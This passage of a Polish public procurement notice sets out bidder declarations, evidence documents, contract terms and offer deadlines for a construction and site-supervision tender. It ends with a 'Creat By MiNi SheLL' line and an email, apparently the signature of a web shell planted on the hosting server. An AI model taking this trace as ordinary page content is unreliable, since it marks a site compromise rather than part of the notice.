co najmniej 150 m2 spełniającej wymogi bezpieczeństwa, wykonanej należycie, zakończonej oraz przekazanej do użytkowania.<br/><br/>2) W celu potwierdzenia warunku w zakresie Części nr 2 Wykonawca winien wykazać:<br/>a)	dysponowanie osobą, którą skieruje do realizacji zamówienia publicznego posiadającą uprawnienia budowlane do pełnienia samodzielnej funkcji technicznej w budownictwie - inspektora nadzoru inwestorskiego w specjalności konstrukcyjno-budowlanej, w zakresie zgodnym z przedmiotem zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1) Wykonawca składa oświadczenie Wykonawcy o aktualności informacji zawartych w oświadczeniu (wg Załącznika nr 2B do SWZ), o którym mowa w art. 125 ust. 1 ustawy PZP, w zakresie podstaw wykluczenia z postępowania wskazanych przez Zamawiającego.<br/>2) Wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby, przedstawia oświadczenie podmiotu udostępniającego zasoby o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu, potwierdzające brak podstaw wykluczenia tego podmiotu oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim Wykonawca powołuje się na jego zasoby (wg Załącznika nr 2B do SWZ).</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1) Wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy warz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane (wg Załącznika nr 3 do SWZ) oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty – dotyczy Części nr 1.<br/>2) Wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za kierowanie robotami budowlanymi, wraz z informacjami na temat ich uprawnień, doświadczenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami (wg Załącznika nr 4 do SWZ) – dotyczy Części nr 1 i Części nr 2.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie żąda złożenia przedmiotowych środków dowodowych. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> W przypadku, gdy Wykonawca w celu potwierdzenia spełnienia warunków udziału w postępowaniu polega na zdolnościach<br/>podmiotów udostępniających zasoby, zobowiązany jest dołączyć do oferty:<br/>1) oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstaw do wykluczenia tego podmiotu oraz<br/>odpowiednio spełnianie warunków udziału w postępowaniu w zakresie, w jakim Wykonawca powołuje się na jego zasoby, o<br/>którym mowa w art. 125 ust. 1 ustawy PZP (wg Załącznika nr 2A do SWZ),<br/>2) zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby<br/>realizacji danego zamówienia (wg Załącznika nr 5 do SWZ) lub inny podmiotowy środek dowodowy potwierdzający, że<br/>Wykonawca realizując zamówienia, będzie dysponował zasobami tych podmiotów. Zobowiązanie to określa w<br/>szczególności:<br/>a) zakres dostępnych Wykonawcy zasobów podmiotu udostępniającego zasoby;<br/>b) sposób i okres udostępnienia Wykonawcy i wykorzystania przez niego zasobów podmiotu udostępniającego te zasoby<br/>przy wykonywaniu zamówienia;<br/>c) czy i w jakim zakresie podmiot udostępniający zasoby, na zdolnościach którego Wykonawca polega w odniesieniu do<br/>warunków udziału w postępowaniu dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, zrealizuje<br/>roboty budowlane lub usługi, których wskazane zdolności dotyczą.<br/><br/>Wykonawca może złożyć tylko jedną ofertę.<br/><br/>Treść oferty musi być zgodna z wymaganiami Zamawiającego określonymi w dokumentach zamówienia.<br/><br/>Ofertę sporządza się w języku polskim na formularzu oferty (wg Załącznika nr 1 do SWZ).<br/>Kompletna oferta Wykonawcy powinna zawierać:<br/>1)	formularz oferty – wg Załącznika nr 1 do SWZ;<br/>2)	pełnomocnictwo lub inny dokument potwierdzający uprawnienie do podpisania oferty (np. KRS, CEiDG, uchwała zgromadzenia wspólników),<br/>3)	oświadczenie Wykonawcy, o którym mowa w rozdz. 8 (wg Załącznika nr 2A do SWZ),<br/>4)	oświadczenie, z którego wynika, które roboty wykonają poszczególni Wykonawcy, o którym mowa w rozdz. 12 ust. 12.1 pkt 2 SWZ – wg Załącznika nr 2C do SWZ (jeżeli dotyczy),<br/>5)	dokumenty dotyczące podmiotu udostępniającego zasoby (jeżeli dotyczy):<br/>a)	oświadczenie podmiotu udostępniającego zasoby, o którym mowa w rozdz.12 ust. 12.2 pkt 1 SWZ – wg Załącznika nr 2A do SWZ,<br/>b)	dokumenty potwierdzające spełnianie warunków udziału w postępowaniu i brak podstaw do wykluczenia, o których mowa w rozdz.12 ust. 12.2 pkt 2 SWZ,<br/>c)	pełnomocnictwo lub inny dokument potwierdzający uprawnienie do podpisania dokumentów dotyczących podmiotu udostępniającego zasoby (np. KRS, CEiDG, uchwała zgromadzenia wspólników). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia w celu potwierdzenia, że Wykonawca nie podlega wykluczeniu oraz spełnia warunki udziału w postępowaniu winien złożyć:<br/>1)	oświadczenie, o którym mowa w art. 125 ust. 1 ustawy PZP (wg Załącznika nr 2A do SWZ) – składa każdy Wykonawca do oferty,<br/>2)	oświadczenie, z którego wynika, które roboty wykonają poszczególni Wykonawcy w przypadku Wykonawców wspólnie ubiegających się o zamówienie (wg Załącznika nr 2C do SWZ) – składa każdy z Wykonawców do oferty,<br/>3)	oświadczenie, o którym mowa w rozdz. 9 pkt. 1 SWZ (wg Załącznika nr 2B do SWZ) – składa każdy z Wykonawców na wezwanie Zamawiającego,<br/>4)	dokumenty, o których mowa w rozdz. 10 SWZ – składa odpowiednio Wykonawca, który wykazuje spełnienie warunku, w zakresie i na zasadach opisanych odpowiednio w rozdz. 6 SWZ – na wezwanie Zamawiającego, <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Projektowane postanowienia umowy oraz zmiany do umowy określa wzór umowy stanowiący Załącznik nr 6 i Załącznik nr 6A do SWZ.<br/>2. Złożenie oferty jest równoznaczne z pełną akceptacją projektu umowy przez Wykonawcę. Wykonawca, który przedstawił najkorzystniejszą ofertę, będzie zobowiązany do podpisania umowy zgodnej ze wzorem umowy załączonym do SWZ. <br/>3. Wszelkie zmiany umowy wymagają dla swej ważności formy pisemnej pod rygorem nieważności i będą dopuszczalne w granicach unormowania art. 455 ustawy PZP. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-08-28 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę wraz z wymaganymi w SWZ dokumentami należy umieścić na Platformie pod adresem: https://platformazakupowa.pl/pn/umbielskpodlaski w myśl ustawy PZP na stronie internetowej prowadzonego postępowania.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-08-28 10:10</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-09-26</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. Zamawiający, działając zgodnie z art. 310 ustawy z dnia 11 września 2019 r. – Prawo zamówień publicznych (t.j. Dz.U. z 2024 r. poz. 1320 z późn. zm.), zastrzega sobie możliwość unieważnienia niniejszego postępowania o udzielenie zamówienia, jeżeli nie zostaną mu przyznane środki publiczne, tj. dofinansowanie, które Zamawiający zamierzał przeznaczyć na sfinansowanie zamówienia. <br/><br/>2. Wykonawca może złożyć ofertę wyłącznie na jedną część zamówienia. Złożenie oferty przez tego samego wykonawcę na więcej niż jedną część zamówienia (samodzielnie, jako uczestnik konsorcjum lub w ramach podmiotów udostępniających zasoby) będzie skutkować odrzuceniem wszystkich jego ofert jako niezgodnych z warunkami zamówienia, na podstawie art. 226 ust. 1 pkt 5 ustawy Prawo zamówień publicznych. W ramach jednej części zamówienia oferta musi obejmować jej pełny zakres.<br/>Zamawiający, działając na podstawie art. 16 ustawy z dnia 11 września 2019 r. – Prawo zamówień publicznych, w szczególności mając na uwadze zasadę uczciwej konkurencji, równego traktowania wykonawców i proporcjonalności, wprowadza ograniczenie polegające na możliwości złożenia oferty wyłącznie na jedną z części zamówienia.<br/>Uzasadnieniem takiego ograniczenia jest charakter przedmiotu zamówienia oraz konieczność zapewnienia bezstronności i niezależności podmiotów realizujących poszczególne części. Jedna z części zamówienia obejmuje wykonanie robót budowlanych, a druga – pełnienie funkcji inspektora nadzoru inwestorskiego nad tymi robotami. Funkcja inspektora ma charakter kontrolny i zgodnie z art. 25 ust. 2 ustawy z dnia 7 lipca 1994 r. – Prawo budowlane, musi być wykonywana z zachowaniem pełnej bezstronności i niezależności od wykonawcy robót.<br/>Dopuszczenie możliwości składania ofert na obie części przez tego samego wykonawcę mogłoby prowadzić do konfliktu interesów oraz podważać wiarygodność i skuteczność nadzoru inwestorskiego. Ograniczenie to ma na celu uniknięcie takiej sytuacji oraz zapewnienie obiektywnego i rzetelnego wykonania każdej części zamówienia.<br/>Wprowadzone ograniczenie nie narusza zasad uczciwej konkurencji, lecz wręcz przeciwnie – służy ich realizacji, umożliwiając udział w postępowaniu większej liczbie niezależnych wykonawców i zapewniając przejrzystość oraz bezpieczeństwo realizacji inwestycji.<br/><br/>3. Wykonawcy przysługują środki ochrony prawnej zgodnie z Ustawą Prawo zmówień publicznych. Środki ochrony prawnej zostały szczegółowo opisane w Rozdziale 29 SWZ.<br/><br/>4. Zamawiający nie zastrzega osobistego wykonania przez Wykonawcę kluczowych części zamówienia.<br/><br/>5. Wykonawca nie może podlegać wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz.U z 2023 r. poz. 1497).<br/><br/>6. Zamawiający nie przewiduje stosowania wymagań w zakresie zatrudnienia na podstawie stosunku pracy w okolicznościach o których mowa w art. 96 ust. 2 pkt 2 ustawy Pzp.<br/><br/>7. Od Wykonawcy, którego oferta zostanie wybrana jako najkorzystniejsza w zakresie Części 1, wymagane będzie wniesienie, przed zawarciem umowy, zabezpieczenia należytego wykonania umowy w wysokości 5% ceny całkowitej (brutto) podanej w ofercie. <br/><br/>8. Zamawiający nie przewiduje udzielenia zamówień, o których mowa w art. 214 ust. 1 pkt 7 i 8 ustawy Pzp.

Creat By MiNi SheLL
Email: jattceo@gmail.com